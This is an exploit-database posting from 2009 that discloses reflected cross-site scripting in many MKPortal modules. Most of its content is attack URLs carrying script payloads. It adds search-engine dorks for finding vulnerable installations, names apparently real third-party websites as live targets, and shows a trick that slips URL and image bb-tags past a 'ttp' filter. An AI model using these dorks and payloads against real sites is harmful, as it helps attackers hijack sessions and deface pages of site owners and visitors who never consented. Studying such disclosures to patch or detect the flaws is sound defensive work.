mkportal-xss.txt
Posted on 02 September 2009
======================================= MKPortal <= global module Vulnerability ======================================= 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 0 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1 #[+] Discovered By : Inj3ct0r #[+] Site : Inj3ct0r.com #[+] support e-mail : submit[at]inj3ct0r.com ################################################## Vulnerable products: MKPortal module gbook Exploit Dork: "inurl:index.php?Ind=gbook" ################################################## --------------------------------------------------------------------- 1. Multiple pXSS Vulnerability in the file index.php. Exploit: /index.php?ind=gbook&content=%3Cscript%3Ealert(1)%3C/script%3E /index.php?ind=gbook&blocks=%3Cscript%3Ealert(1)%3C/script%3E /index.php?ind=gbook&message=%3Cscript%3Ealert(1)%3C/script%3E Example: http://otradnoe.ru.net//index.php?ind=gbook&content=%3Cscript%3Ealert(1)%3C/script%3E http://otradnoe.ru.net//index.php?ind=gbook&blocks=%3Cscript%3Ealert(1)%3C/script%3E http://otradnoe.ru.net//index.php?ind=gbook&message=%3Cscript%3Ealert(1)%3C/script%3E --------------------------------------------------------------------- 2. Insert prohibited bb-tags [img] and [url] in the message Vulnerability in the file index.php. A vulnerable piece of code: $message = stripslashes($message); $message = preg_replace('/[URL=(.+?)](.+)[/URL]/i',$no_url,$message); $message = preg_replace('/[IMG](.+?)[/IMG]/i',$no_img,$message); $message = str_replace("ttp","", $message); get around restrictions: [UttpRL=htttptp://inj3ct0r.com]inj3ct0r.com[/URL] [IMttpG]htttptps://inj3ct0r.org/image.php?i=1&dateline=[/IMG] ################################################## Vulnerable products: MKPortal module whois Exploit Dork: "inurl:index.php?Ind=whois" ################################################## 1. pXSS Vulnerability in the file index.php. Exploit: /index.php?ind=whois&blocks=%3Cscript%3Ealert(1)%3C/script%3E Example: http://kitimedia.com/index.php?ind=whois&blocks=%3Cscript%3Ealert(1)%3C/script%3E ################################################## Vulnerable products: MKPortal module lenta Exploit Dork: "inurl:index.php?ind=" graber lenta ################################################## 1. Multiple pXSS Vulnerability in the file index.php. Exploit: /index.php?ind=lenta&output=%3Cscript%3Ealert(1)%3C/script%3E /index.php?ind=lenta&blocks=%3Cscript%3Ealert(1)%3C/script%3E Example: http://www.nissanclub72.ru/index.php?ind=lentanews&output=%3Cscript%3Ealert(1)%3C/script%3E http://www.nissanclub72.ru/index.php?ind=lentanews&blocks=%3Cscript%3Ealert(1)%3C/script%3E #################################################### Vulnerable products: MKPortal modules metric Exploit #################################################### 1. pXSS ----------------------------- metric Exploit: /metric/?output=%3Cscript%3Ealert(1)%3C/script%3E /metric/?error=%3Cscript%3Ealert(1)%3C/script%3E /metric/?blocks=%3Cscript%3Ealert(1)%3C/script%3E ------------------------------------------ recommend Exploit: /index.php?ind=recommend&blocks=%3Cscript%3Ealert(1)%3C/script%3E Example: http://www.street-style.su/index.php?ind=recommend&blocks=%3Cscript%3Ealert(1)%3C/script%3E ------------------------------------------ anekdot Exploit: /Anekdot/?output=%3Cscript%3Ealert(1)%3C/script%3E /Anekdot/?blocks=%3Cscript%3Ealert(1)%3C/script%3E /Anekdot/?contents=%3Cscript%3Ealert(1)%3C/script%3E Example: http://www.isranetclub.com/isra/Anekdot/?output=%3Cscript%3Ealert(1)%3C/script%3E http://www.isranetclub.com/isra/Anekdot/?blocks=%3Cscript%3Ealert(1)%3C/script%3E http://www.isranetclub.com/isra/Anekdot/?contents=%3Cscript%3Ealert(1)%3C/script%3E --------------------------- contact Exploit: /contact/index.php?blocks=%3Cscript%3Ealert(1)%3C/script%3E /contact/mail.php?to=1@1.1&mess=2&subj=3&headers=4&name=5&teme=6&soob=7&email=2@2.2&output=%3Cscript%3Ealert(1)%3C/script%3E /contact/mail.php?to=1@1.1&mess=2&subj=3&headers=4&name=5&teme=6&soob=7&email=2@2.2&blocks=%3Cscript%3Ealert(1)%3C/script%3E --------------------------- speed connection Exploit: /speed/?output=%3Cscript%3Ealert(1)%3C/script%3E /speed/?blocks=%3Cscript%3Ealert(1)%3C/script%3E --------------------------- horoscop Exploit: /index.php?ind=horoscop&blocks=%3Cscript%3Ealert(1)%3C/script%3E /index.php?ind=horoscop&output=%3Cscript%3Ealert(1)%3C/script%3E ---------------------------- phones Exploit: /catphones/index.php?output=%3Cscript%3Ealert(1)%3C/script%3E /catphones/index.php?blocks=%3Cscript%3Ealert(1)%3C/script%3E In general, the vulnerability exists because of stupidity. the code is a variable that is formed during the execution of the script and she gradually appropriated the additional data. In the vulnerable code modules approximately as follows: <? //code if (/*some*/) { //some code vuln_var .= 'some content'; } else { //some code vuln_var .= 'some content'; } //some code echo $vuln_var; //some code ?> This XSS extended to 90% of the modules for MKPortal from rusmkportal.ru =] ---------------------------------------------- ThE End =] Visit my proj3ct : http://inj3ct0r.com http://inj3ct0r.org http://inj3ct0r.net # ~ - [ [ : Inj3ct0r : ] ]
